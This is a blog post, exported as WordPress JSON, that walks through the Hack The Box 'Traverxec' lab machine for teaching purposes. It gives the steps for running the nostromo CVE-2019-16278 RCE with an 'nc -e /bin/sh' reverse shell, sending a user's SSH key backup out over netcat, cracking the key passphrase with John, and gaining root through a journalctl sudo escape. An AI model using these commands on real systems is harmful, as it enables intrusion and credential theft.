{"id":311,"date":"2022-08-10T12:13:49","date_gmt":"2022-08-10T12:13:49","guid":{"rendered":"https:\/\/hacking.cool\/?p=311"},"modified":"2024-03-18T20:45:21","modified_gmt":"2024-03-18T20:45:21","slug":"__trashed","status":"publish","type":"post","link":"https:\/\/hacking.cool\/atomanya\/__trashed\/","title":{"rendered":"HTB Traverxec walkthrough"},"content":{"rendered":"\n
\"\"<\/figure>\n\n\n\n

Hi everyone! Here is my second walkthrough. Let’s start with nmap:<\/p>\n\n\n\n

nmap -A 10.10.10.165<\/strong><\/p>\n\n\n\n

(We use -A flag for OS detection, version detection, script scanning and traceroute)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

As we can see, two ports are open: 22 – SSH, and 80 – HTTP. And we can notice the interesting web server nostromo 1.9.6. I suggest first check the site and after google the server version.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

It seems to be noting here… and let’s google:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

BINGO!!! WE’VE FOUND AN EXPLOIT! \ud83d\ude42 Vulnerability CVE: 2019-16278 nostromo 1.9.6 – Remote Code Execution. I’m going to use the first link: <\/p>\n\n\n\n

https:\/\/www.exploit-db.com\/exploits\/47837<\/a><\/p>\n\n\n\n

Creating a file with the code (I use nano):<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Usage is: cve2019-16278.py <Target_IP> <Target_Port> <Command>’ <\/p>\n\n\n\n

Therefore we need to chose an appropriate command to get a reverse shell. I will use netcat shell: nc -e \/bin\/sh 10.0.0.1 1234<\/p>\n\n\n\n

So my full command will be:<\/p>\n\n\n\n

python2 CVE-2019-16278.py 10.10.10.165 80 “nc -e \/bin\/sh 10.10.14.4 1234”<\/strong><\/p>\n\n\n\n

(Don’t forget to change 10.10.14.4 to your ip address)<\/p>\n\n\n\n

And before run above command we have to set our netcat listener:<\/p>\n\n\n\n

nc -lnvp 1234<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n

Checking the window with netcat: <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nice, connection is established. Let’s make our shell interactive:<\/p>\n\n\n\n

python3 -c ‘import pty;pty.spawn(“\/bin\/bash”)’<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Next I checked the user’s home directory for a flag. But our shell is low privileged and we don’t have this permission:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

After some enumeration we can find httpd.conf<\/strong> file:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Folder public_www must be in home directory. Checking if it is accessible:<\/p>\n\n\n\n

cd \/home\/david\/public_www<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Yes it is, and we can see the folder protected-file-area. Go into:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nice! We’ve found a backup files. Let’s send it to our machine with netcat:<\/p>\n\n\n\n

nc -lvp 1235 > backup-ssh-identity-files.tgz <\/strong><\/p>\n\n\n\n

(first step – run this command locally on your machine to receive the file. You can use other port instead of 1235, and call the file shorter instead of backup-ssh-identity-files.tgz)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

nc 10.10.14.8 1235 < \/home\/david\/public_www\/protected-file-area\/backup-ssh-identity-files.tgz<\/strong><\/p>\n\n\n\n

(second step – run this command on the victim server to transfer the file. Don’t forget to change ip address to your one)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And checking our own machine:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Connection was established. Now is time to audit what we have. To unpack files from .tgz use the following command:<\/p>\n\n\n\n

tar -zxvf backup-ssh-identity-files.tgz<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Extracted files seem to be ssh keys of david user. Maybe we will be able to use it to connect to the server via ssh. But it requires a passphrase to connect and we need to crack it before. I’m going to use John the Ripper tool. First we need to create file with ssh2john in format for John (inside .ssh folder where is id_rsa key):<\/p>\n\n\n\n

sudo python3 \/usr\/share\/john\/ssh2john.py id_rsa > key<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Take a look inside the file (if everything is correct you will see a hash inside):<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Next we will crack a hash using wordlist rockyou.txt for bruteforce:<\/p>\n\n\n\n

john -w=\/usr\/share\/wordlists\/rockyou.txt key<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Cool! Passphrase has been cracked! \ud83d\ude42<\/p>\n\n\n\n

One more thing to do is setting the permission for the file (file with the key for ssh should have 600 permission):<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Now we can utilize the private key id_rsa to connect via david’s ssh. As we already know passphrase for key is hunter:<\/p>\n\n\n\n

ssh -i id_rsa david@10.10.10.165<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Cat the user.txt and lets take a look what’s inside the bin folder:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Checking the script server-stats.sh:<\/p>\n\n\n\n

cat server-stats.sh<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nice, it executes journalctl using sudo \ud83d\ude09 I will visit GTFBins and look if there any privilage escalation tips for the journalctl:<\/p>\n\n\n\n

https:\/\/gtfobins.github.io\/gtfobins\/journalctl\/<\/a><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

So we need to run the command:<\/p>\n\n\n\n

\/usr\/bin\/sudo \/usr\/bin\/journalctl -n5 -unostromo.service<\/strong><\/p>\n\n\n\n

(Must have is to resize or terminal window before you run it. Here is quotation from the journalctl manpage: The output is paged through less by default, and long lines are “truncated” to screen width. Therefore make terminal window smaller to have a mode with input.)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Then write:<\/p>\n\n\n\n

!\/bin\/sh <\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And press Enter:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Hurrah!!! Machine has been rooted \ud83d\ude42<\/p>\n\n\n\n

Grabbing a root flag:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Congratulations! And thanks for your attention. <\/p>\n","protected":false},"excerpt":{"rendered":"

Hi everyone! Here is my second walkthrough. Let’s start with nmap: nmap -A 10.10.10.165 (We use -A flag for OS detection, version detection, script scanning and traceroute) As we can see, two ports are open: 22 – SSH, and 80 – HTTP. And we can notice the interesting web server nostromo 1.9.6. I suggest first…<\/span><\/p>\n

Read More<\/a><\/p>\n","protected":false},"author":2,"featured_media":877,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-311","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-walktroughs"],"yoast_head":"\nHTB Traverxec walkthrough - hacking.cool<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hacking.cool\/atomanya\/__trashed\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HTB Traverxec walkthrough - hacking.cool\" \/>\n<meta property=\"og:description\" content=\"Hi everyone! Here is my second walkthrough. Let’s start with nmap: nmap -A 10.10.10.165 (We use -A flag for OS detection, version detection, script scanning and traceroute) As we can see, two ports are open: 22 – SSH, and 80 – HTTP. And we can notice the interesting web server nostromo 1.9.6. I suggest first…Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hacking.cool\/atomanya\/__trashed\/\" \/>\n<meta property=\"og:site_name\" content=\"hacking.cool\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-10T12:13:49+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-18T20:45:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png\" \/>\n\t<meta property=\"og:image:width\" content=\"799\" \/>\n\t<meta property=\"og:image:height\" content=\"514\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Anya\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Anya\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\",\"url\":\"https:\/\/hacking.cool\/atomanya\/\",\"name\":\"hacking.cool\",\"description\":\"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/#primaryimage\",\"url\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png\",\"contentUrl\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png\",\"width\":799,\"height\":514},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/\",\"url\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/\",\"name\":\"HTB Traverxec walkthrough - hacking.cool\",\"isPartOf\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/#primaryimage\"},\"datePublished\":\"2022-08-10T12:13:49+00:00\",\"dateModified\":\"2024-03-18T20:45:21+00:00\",\"author\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\"},\"breadcrumb\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hacking.cool\/atomanya\/__trashed\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/__trashed\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hacking.cool\/atomanya\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HTB Traverxec walkthrough\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\",\"name\":\"Anya\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"caption\":\"Anya\"},\"url\":\"https:\/\/hacking.cool\/atomanya\/author\/anya\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HTB Traverxec walkthrough - hacking.cool","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hacking.cool\/atomanya\/__trashed\/","og_locale":"en_US","og_type":"article","og_title":"HTB Traverxec walkthrough - hacking.cool","og_description":"Hi everyone! Here is my second walkthrough. Let’s start with nmap: nmap -A 10.10.10.165 (We use -A flag for OS detection, version detection, script scanning and traceroute) As we can see, two ports are open: 22 – SSH, and 80 – HTTP. And we can notice the interesting web server nostromo 1.9.6. I suggest first…Read More","og_url":"https:\/\/hacking.cool\/atomanya\/__trashed\/","og_site_name":"hacking.cool","article_published_time":"2022-08-10T12:13:49+00:00","article_modified_time":"2024-03-18T20:45:21+00:00","og_image":[{"width":799,"height":514,"url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png","type":"image\/png"}],"author":"Anya","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Anya","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/hacking.cool\/atomanya\/#website","url":"https:\/\/hacking.cool\/atomanya\/","name":"hacking.cool","description":"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/__trashed\/#primaryimage","url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png","contentUrl":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png","width":799,"height":514},{"@type":"WebPage","@id":"https:\/\/hacking.cool\/atomanya\/__trashed\/","url":"https:\/\/hacking.cool\/atomanya\/__trashed\/","name":"HTB Traverxec walkthrough - hacking.cool","isPartOf":{"@id":"https:\/\/hacking.cool\/atomanya\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hacking.cool\/atomanya\/__trashed\/#primaryimage"},"datePublished":"2022-08-10T12:13:49+00:00","dateModified":"2024-03-18T20:45:21+00:00","author":{"@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6"},"breadcrumb":{"@id":"https:\/\/hacking.cool\/atomanya\/__trashed\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hacking.cool\/atomanya\/__trashed\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/hacking.cool\/atomanya\/__trashed\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hacking.cool\/atomanya\/"},{"@type":"ListItem","position":2,"name":"HTB Traverxec walkthrough"}]},{"@type":"Person","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6","name":"Anya","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","caption":"Anya"},"url":"https:\/\/hacking.cool\/atomanya\/author\/anya\/"}]}},"jetpack_featured_media_url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/08\/1-bQgJYMwmg2FgIL_i9996hg.png","_links":{"self":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/comments?post=311"}],"version-history":[{"count":70,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/311\/revisions"}],"predecessor-version":[{"id":861,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/311\/revisions\/861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media\/877"}],"wp:attachment":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media?parent=311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/categories?post=311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/tags?post=311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}